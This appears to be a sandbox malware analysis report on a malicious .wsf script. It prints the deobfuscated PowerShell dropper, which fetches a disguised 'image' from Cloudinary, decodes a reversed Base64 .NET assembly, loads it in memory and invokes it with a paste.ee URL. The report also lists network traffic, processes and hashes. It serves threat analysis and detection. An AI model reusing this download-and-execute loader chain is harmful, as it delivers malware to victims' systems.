
Analysis

  • max time kernel
    117s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    2024-12-04, 02:31 UTC

General

  • Target

    4e176fd538ca3aade9d71291f18cbe73022c88dd19e29fba250a6d0a9137be17.wsf

  • Size

    3KB

  • MD5

    2351b140cfa13f0cf05f93b471edd1f6

  • SHA1

    aab24f356405a117ce7df0016b131872fb1b2f16

  • SHA256

    4e176fd538ca3aade9d71291f18cbe73022c88dd19e29fba250a6d0a9137be17

  • SHA512

    bb7e68724ba4e4169e90b0ff3d6379dda43c0d01bf1e26b91211a124833317a4741bb6c5f0c3e97bcc79f8d01460bb09b6cf963c2f39890b7063ddd1b74f0085

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
# powershell snippet 0
# Stage 1, as recovered from the powershell.exe command line that WScript.exe spawned
# (see Processes, PID 2352): $originador is a Base64 blob that decodes to the script held
# in $alegorista and is then executed with Invoke-Expression. The blob itself has been
# redacted from this copy of the report, so only its decoded form below is available.
$originador = "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"
# Stage 2, one statement per ';'. Read left to right:
#  - the repeated $PSVersionTable checks discard their result with [void] and nothing
#    branches on them; they look like padding rather than a real environment check
#  - downloads https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
#    with System.Net.WebClient and treats the bytes as UTF-8 text. The Network section
#    shows the server answering with Content-Type: image/jpeg and 2,230,233 bytes, i.e.
#    the "image" is a carrier for text. The URL literal ends in a space (rendered as %20
#    in the URLs section); the request actually recorded has no trailing space
#  - keeps only the text between the literal markers <<BASE64_START>> and <<BASE64_END>>
#  - `$tascar -ge 0 -and $mocambeiro -gt $tascar;` is a bare expression: it emits
#    True/False to the pipeline but guards nothing, so a missing marker would still
#    reach Substring and throw there
#  - reverses the extracted string (the [-1..-len] index on the char array), Base64-decodes
#    it and loads the result with [System.Reflection.Assembly]::Load, so the next stage
#    never touches disk as a file
#  - invokes the static method VAI of type dnlib.IO.Home in that assembly. Its first
#    argument is a reversed URL: '0/eGpuN/r/ee.etsap//:sptth' reads https://paste.ee/r/NupGe/0
#    when reversed. 'MSBuild' is passed in the same argument list; presumably the host
#    process for whatever VAI fetches, but this report does not show that step running
#    (no request for /r/NupGe/0 from powershell.exe appears in the Network section; the
#    only paste.ee traffic is WScript.exe fetching /d/81FCf, which is the stage-1 download)
$alegorista = "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antivivisseccionista = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$plumacho = New-Object System.Net.WebClient;$convocar = $plumacho.DownloadData($antivivisseccionista);$acceleratriz = [System.Text.Encoding]::UTF8.GetString($convocar);$chincharravelho = '<<BASE64_START>>';$obcecar = '<<BASE64_END>>';$tascar = $acceleratriz.IndexOf($chincharravelho);$mocambeiro = $acceleratriz.IndexOf($obcecar);$tascar -ge 0 -and $mocambeiro -gt $tascar;$tascar += $chincharravelho.Length;$anficarpo = $mocambeiro - $tascar;$acasuso = $acceleratriz.Substring($tascar, $anficarpo);$estufadeira = -join ($acasuso.ToCharArray() | ForEach-Object { $_ })[-1..-($acasuso.Length)];$piassaba = [System.Convert]::FromBase64String($estufadeira);$medulante = [System.Reflection.Assembly]::Load($piassaba);$graficamente = [dnlib.IO.Home].GetMethod('VAI');$graficamente.Invoke($null, @('0/eGpuN/r/ee.etsap//:sptth', 'brando', 'brando', 'brando', 'MSBuild', 'brando', 'brando','brando','brando','brando','brando','brando','1','brando'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
# The same stage-2 text is handed to invoke-expression verbatim; this is the point at
# which the download-and-load chain above actually runs. Note that the deobfuscator
# renders both copies inside double quotes, so the $-prefixed names shown here are
# its rendering of the decoded script rather than a literal that survived interpolation.
invoke-expression "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antivivisseccionista = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$plumacho = New-Object System.Net.WebClient;$convocar = $plumacho.DownloadData($antivivisseccionista);$acceleratriz = [System.Text.Encoding]::UTF8.GetString($convocar);$chincharravelho = '<<BASE64_START>>';$obcecar = '<<BASE64_END>>';$tascar = $acceleratriz.IndexOf($chincharravelho);$mocambeiro = $acceleratriz.IndexOf($obcecar);$tascar -ge 0 -and $mocambeiro -gt $tascar;$tascar += $chincharravelho.Length;$anficarpo = $mocambeiro - $tascar;$acasuso = $acceleratriz.Substring($tascar, $anficarpo);$estufadeira = -join ($acasuso.ToCharArray() | ForEach-Object { $_ })[-1..-($acasuso.Length)];$piassaba = [System.Convert]::FromBase64String($estufadeira);$medulante = [System.Reflection.Assembly]::Load($piassaba);$graficamente = [dnlib.IO.Home].GetMethod('VAI');$graficamente.Invoke($null, @('0/eGpuN/r/ee.etsap//:sptth', 'brando', 'brando', 'brando', 'MSBuild', 'brando', 'brando','brando','brando','brando','brando','brando','1','brando'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"

# powershell snippet 1
# The deobfuscator's line-by-line rendering of the start of stage 2 (same script as
# $alegorista above, lower-cased and with the URL inlined into downloaddata). It is cut
# off on this page after the decode of the downloaded bytes; the marker search, string
# reversal, Assembly.Load and the VAI call are only visible in snippet 0. This rendering
# decodes with ASCII where snippet 0 used UTF8 — a difference in the tool's output, not
# evidence of a second variant.
if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) {
[void]$psversiontable.psversion
} else {
write-output "PowerShell version Not available"
}
if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) {
[void]$psversiontable.psversion
} else {
write-output "PowerShell version Not available"
}
# Carrier URL; the trailing space inside the quotes is part of the literal.
$antivivisseccionista = "https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg "
$plumacho = new-object system.net.webclient
# No User-Agent or proxy settings are set on the WebClient; the recorded request
# (Network section) carries only Host and Connection headers, which matches that.
$convocar = $plumacho.downloaddata("https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ")
$acceleratriz = ([system.text.encoding]::ascii).getstring($convocar)
URLs
ps1.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

exe.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4e176fd538ca3aade9d71291f18cbe73022c88dd19e29fba250a6d0a9137be17.wsf"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2360
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $originador = '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';$alegorista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($originador));Invoke-Expression $alegorista
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2352

Network

  • flag-us
    DNS
    paste.ee
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    paste.ee
    IN A
    Response
    paste.ee
    IN A
    172.67.187.200
    paste.ee
    IN A
    104.21.84.67
  • flag-us
    GET
    http://paste.ee/d/81FCf
    WScript.exe
    Remote address:
    172.67.187.200:80
    Request
    GET /d/81FCf HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: paste.ee
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Wed, 04 Dec 2024 02:31:24 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Location: https://paste.ee/d/81FCf
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4j3UkgAEwXIMvFvM6ubgz8psIRpNCRTpo2HAXijNMGZQkR9LTf2PSomHvNGkvF9Ff3xT%2FrX1jN9T%2FF9XQaRw0HHzJbeh3EOL5FnknnFxFngVHVrSHvpjNMqAhw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ec861476cb063ff-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27518&min_rtt=27518&rtt_var=13759&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=173&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  • flag-us
    GET
    https://paste.ee/d/81FCf
    WScript.exe
    Remote address:
    172.67.187.200:443
    Request
    GET /d/81FCf HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: paste.ee
    Response
    HTTP/1.1 200 OK
    Date: Wed, 04 Dec 2024 02:31:24 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=2592000
    strict-transport-security: max-age=63072000
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1; mode=block
    content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G2rvIrW5vWkYjYu6h6a3lORMW8ybm%2FjiKAU%2F9QHLzjLW0uw21%2BcSHfMVCR0Tam6reXprctg3Xt3PXb7O4tMCU4ftlgMCXUuqOLuk6fDNHofeJRM12RcIG0wJWw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ec8614a28026412-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=31198&min_rtt=26190&rtt_var=14908&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=459&delivery_rate=115276&cwnd=253&unsent_bytes=0&cid=c9b75079b782d998&ts=250&x=0"
  • flag-us
    DNS
    res.cloudinary.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    res.cloudinary.com
    IN A
    Response
    res.cloudinary.com
    IN CNAME
    ion.cloudinary.com.edgekey.net
    ion.cloudinary.com.edgekey.net
    IN CNAME
    e1315.dsca.akamaiedge.net
    e1315.dsca.akamaiedge.net
    IN A
    2.18.108.33
  • flag-gb
    GET
    https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
    powershell.exe
    Remote address:
    2.18.108.33:443
    Request
    GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
    Host: res.cloudinary.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: image/jpeg
    Content-Length: 2230233
    ETag: "7b9a6708dc7c92995f443d0b41dbc8d0"
    Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
    Date: Wed, 04 Dec 2024 02:31:29 GMT
    Connection: keep-alive
    Cache-Control: public, no-transform, immutable, max-age=2592000
    x-request-id: 6f487a4c60d72621f2efeecff85ca20a
    Access-Control-Expose-Headers: Content-Length,Content-Disposition,Content-Range,Etag,Server-Timing,Vary,X-Cld-Error,X-Robots-Tag,X-Content-Type-Options
    Access-Control-Allow-Origin: *
    Accept-Ranges: bytes
    Timing-Allow-Origin: *
    Server: Cloudinary
    Strict-Transport-Security: max-age=604800
    X-Content-Type-Options: nosniff
    Server-Timing: cld-akam;dur=6;start=2024-12-04T02:31:29.042Z;desc=hit,rtt;dur=31,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)"
  • 172.67.187.200:80
    http://paste.ee/d/81FCf
    http
    WScript.exe
    403 B
    1.2kB
    5
    4

    HTTP Request

    GET http://paste.ee/d/81FCf

    HTTP Response

    301
  • 172.67.187.200:443
    https://paste.ee/d/81FCf
    tls, http
    WScript.exe
    2.7kB
    88.7kB
    49
    83

    HTTP Request

    GET https://paste.ee/d/81FCf

    HTTP Response

    200
  • 2.18.108.33:443
    https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
    tls, http
    powershell.exe
    54.7kB
    2.3MB
    1047
    1664

    HTTP Request

    GET https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg

    HTTP Response

    200
  • 8.8.8.8:53
    paste.ee
    dns
    WScript.exe
    54 B
    86 B
    1
    1

    DNS Request

    paste.ee

    DNS Response

    172.67.187.200
    104.21.84.67

  • 8.8.8.8:53
    res.cloudinary.com
    dns
    powershell.exe
    64 B
    160 B
    1
    1

    DNS Request

    res.cloudinary.com

    DNS Response

    2.18.108.33

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabF681.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\TarF6B3.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • memory/2352-44-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB

  • memory/2352-45-0x000007FEF55AE000-0x000007FEF55AF000-memory.dmp

    Filesize

    4KB

  • memory/2352-8-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB

  • memory/2352-9-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB

  • memory/2352-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

    Filesize

    2.9MB

  • memory/2352-6-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

    Filesize

    32KB

  • memory/2352-4-0x000007FEF55AE000-0x000007FEF55AF000-memory.dmp

    Filesize

    4KB

  • memory/2352-7-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB

  • memory/2352-46-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB

  • memory/2352-47-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB

  • memory/2352-48-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB

  • memory/2352-49-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB

  • memory/2352-51-0x000000001AF00000-0x000000001B058000-memory.dmp

    Filesize

    1.3MB

  • memory/2352-52-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB
